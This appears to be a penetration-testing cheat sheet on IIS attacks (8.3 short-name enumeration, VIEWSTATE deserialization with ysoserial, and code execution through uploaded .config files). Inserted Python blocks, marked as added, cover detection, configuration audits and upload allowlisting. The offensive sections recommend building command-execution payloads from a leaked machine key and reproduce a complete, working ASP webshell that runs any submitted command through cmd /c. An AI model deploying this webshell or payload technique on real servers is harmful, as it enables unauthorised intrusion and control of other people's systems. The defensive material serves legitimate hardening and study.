IIS Servers
Short Name Enumeration
IIS servers can expose the Windows 8.3 short name (the form containing the ~ character) of the files they serve. For example, the page complete-transfer.aspx may not be in your wordlist, but you can retrieve its short name complet~.aspx using a script, like this one. This is useful for finding hidden web pages and other content.
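As an added illustration (not code from the original page or from the scanner it mentions), the Python below models how NTFS builds an 8.3 alias, so you can see which of your file names leak a guessable prefix (real aliases carry a numeric suffix, e.g. COMPLE~1.ASP), and then scans constructed IIS W3C log lines for clients probing tilde aliases. The alias model, the log field layout and the sample addresses are assumptions of this example.

```python
import re
from collections import Counter

# Simplified model of NTFS 8.3 alias generation (an assumption of this example):
# uppercase, drop spaces and extra dots, keep 6 base chars + "~N", 3 extension chars.
# Real NTFS switches to a hash-based alias after the fourth collision.
_DROP = re.compile(r"[ .+,;=\[\]]")
_FITS_8DOT3 = re.compile(r"^[A-Z0-9!#$%&'()@^_`{}~-]{1,8}(\.[A-Z0-9!#$%&'()@^_`{}~-]{1,3})?$")


def short_name(long_name, existing=()):
    """Return the 8.3 alias NTFS would create for long_name, or None when the
    name already fits 8.3 (no separate alias exists).  `existing` holds aliases
    already taken in the directory, so the ~N suffix increments on collision."""
    upper = long_name.upper()
    if _FITS_8DOT3.match(upper):
        return None
    base, dot, ext = upper.rpartition(".")
    if not dot:                      # no extension at all
        base, ext = upper, ""
    base = _DROP.sub("", base)[:6]
    ext = _DROP.sub("", ext)[:3]
    for n in range(1, 10):
        alias = f"{base}~{n}" + (f".{ext}" if ext else "")
        if alias not in existing:
            return alias
    return None


# Constructed IIS W3C log excerpt (not from a real server). Field layout assumed:
# date time c-ip cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 GET /*~1*/.aspx 404
2024-01-01 10:00:01 203.0.113.5 GET /a*~1*/.aspx 404
2024-01-01 10:00:02 203.0.113.5 GET /c*~1*/.aspx 400
2024-01-01 10:00:02 203.0.113.5 GET /co*~1*/.aspx 400
2024-01-01 10:00:03 203.0.113.5 OPTIONS /com*~1*/.aspx 400
2024-01-01 10:00:04 198.51.100.9 GET /index.html 200
2024-01-01 10:00:05 198.51.100.9 GET /docs/complete-transfer.aspx 200
"""

# A tilde followed by a digit is the signature of an 8.3 alias in a URL;
# it rarely appears in requests for real long file names.
_ALIAS_IN_URL = re.compile(r"~\d")


def tilde_probe_sources(log_text, threshold=3):
    """Count per-client requests whose URI stem references an 8.3 alias and
    return the clients at or above `threshold`, with their request counts."""
    hits = Counter()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        client, stem = parts[2], parts[4]
        if _ALIAS_IN_URL.search(stem):
            hits[client] += 1
    return {client: n for client, n in hits.items() if n >= threshold}


if __name__ == "__main__":
    for name in ("complete-transfer.aspx", "web.config", "default.asp"):
        print(f"{name:25} -> {short_name(name)}")
    print(tilde_probe_sources(SAMPLE_LOG))
```

Names that already fit 8.3 (default.asp) get no alias and leak nothing extra, which is why the scan is useful against long descriptive names. On the server side, `fsutil 8dot3name set 1` (or the NtfsDisable8dot3NameCreation registry value) stops new aliases from being created, existing ones stay until stripped with `fsutil 8dot3name strip`, and an IIS request-filtering denyUrlSequences entry for `~` rejects these probes before they reach the file system.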
python iis_shortname_scan.py http://10.10.10.10/
VIEWSTATE Deserialization
The VIEWSTATE parameter is used by ASP.NET applications on IIS to carry page and control state between requests. The parameter is serialized and its integrity is protected with a MAC computed from the application's machine key (the machineKey in web.config). If you are able to leak the machine key from web.config, you should be able to serialize a command-execution payload through the VIEWSTATE parameter using ysoserial.
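To make the machine-key point concrete, here is an added Python example (not from the original page or from ysoserial): an audit of the web.config settings that govern VIEWSTATE integrity, plus a toy model of MAC-protected state showing why whoever holds the validation key can produce state the server accepts. The web.config fragment is constructed, and the HMAC construction is a simplification of ASP.NET's real scheme (an assumption, not the actual wire format).

```python
import base64
import hashlib
import hmac
import xml.etree.ElementTree as ET

# Constructed web.config fragment for the audit (not from any real application).
WEB_CONFIG = """\
<configuration>
  <system.web>
    <pages enableViewStateMac="false" />
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>
"""


def audit_viewstate_config(xml_text):
    """Return findings about settings that weaken VIEWSTATE integrity.
    Checked: pages/@enableViewStateMac, machineKey/@validationKey, machineKey/@validation."""
    findings = []
    root = ET.fromstring(xml_text)
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        # Since Microsoft's 2014 security update ASP.NET ignores this and always enforces
        # the MAC, but on older frameworks it disables the check outright.
        findings.append("enableViewStateMac=false: VIEWSTATE accepted without integrity check")
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        if not mk.get("validationKey", "AutoGenerate").startswith("AutoGenerate"):
            findings.append("static validationKey: web.config is now a secret; restrict reads, rotate if exposed")
        if mk.get("validation", "").upper() in ("MD5", "SHA1"):
            findings.append(f"validation={mk.get('validation')}: legacy algorithm, HMACSHA256 is the current default")
    return findings


MAC_LEN = hashlib.sha256().digest_size   # 32 bytes


def sign_state(state, validation_key):
    """Toy MAC-protected state: base64(state || HMAC-SHA256(key, state)).
    Assumption: ASP.NET derives purpose-specific keys and may also encrypt; this is a model."""
    mac = hmac.new(validation_key, state, hashlib.sha256).digest()
    return base64.b64encode(state + mac).decode()


def verify_state(blob, validation_key):
    """Return the state bytes when the MAC verifies under validation_key, else None.
    Anyone holding validation_key can produce blobs this function accepts, which is
    exactly why a leaked machine key matters."""
    raw = base64.b64decode(blob)
    if len(raw) < MAC_LEN:
        return None
    state, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(validation_key, state, hashlib.sha256).digest()
    return state if hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    for finding in audit_viewstate_config(WEB_CONFIG):
        print("finding:", finding)
    key = b"server-side-validation-key"        # constructed
    blob = sign_state(b"page-state", key)
    print("valid key ->", verify_state(blob, key))
    print("wrong key ->", verify_state(blob, b"guess"))
```

The audit is what a reviewer runs over a deployment's web.config; the sign/verify pair shows the threat model in miniature: a client without the key cannot alter or forge state, and a client with a copy of the key is indistinguishable from the server.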
RCE via .config Files
In addition to .asp and .aspx files for webshells, you may be able to upload .config files. These can execute code just the same and are not typically blacklisted. The ASP webshell below works just fine (stolen from here).
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>
<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>
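As an added example (not from the original page), the Python below puts the blacklist approach this section warns about next to an allowlist validator with filename normalisation, and runs both over constructed upload names so the gap is visible. The extension sets and sample names are illustrative assumptions; use the extensions your upload feature actually needs.

```python
import re

# The weak pattern this section warns about: a denylist that knows the obvious
# script extensions but not .config (illustrative set, an assumption of this example).
WEAK_DENYLIST = {"asp", "aspx", "ashx", "asmx", "exe"}

# Hardened pattern: only what the upload feature needs (illustrative set).
UPLOAD_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf"}


def normalize_name(filename):
    """Reduce to a lowercase basename with trailing dots and spaces removed,
    since Windows drops those on file creation ("web.config." lands as web.config)."""
    basename = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return basename.rstrip(". ").lower()


def final_extension(name):
    return name.rsplit(".", 1)[-1] if "." in name else ""


def denylist_allows(filename):
    """Blacklist check: rejects known script extensions, lets everything else through."""
    return final_extension(normalize_name(filename)) not in WEAK_DENYLIST


def allowlist_allows(filename):
    """Allowlist check: a single dot, safe characters only, extension from the allowed set."""
    name = normalize_name(filename)
    if re.fullmatch(r"[a-z0-9_-]{1,64}\.[a-z0-9]{1,5}", name) is None:
        return False
    return final_extension(name) in UPLOAD_ALLOWLIST


def compare(filenames):
    """Return {name: (denylist_verdict, allowlist_verdict)} for a set of upload names."""
    return {f: (denylist_allows(f), allowlist_allows(f)) for f in filenames}


# Constructed upload names exercising the gap between the two approaches.
SAMPLES = ["photo.jpg", "shell.aspx", "web.config", "web.config.",
           "shell.aspx.jpg", "..\\web.config"]

if __name__ == "__main__":
    for name, (deny, allow) in compare(SAMPLES).items():
        print(f"{name!r:20} denylist={'pass' if deny else 'block'}  "
              f"allowlist={'pass' if allow else 'block'}")
```

The denylist stops shell.aspx but waves web.config through, including the trailing-dot and path-prefixed variants once Windows and the upload handler have normalised them; the allowlist rejects every name whose extension is not one the feature needs, so it does not have to know which extensions IIS treats as code.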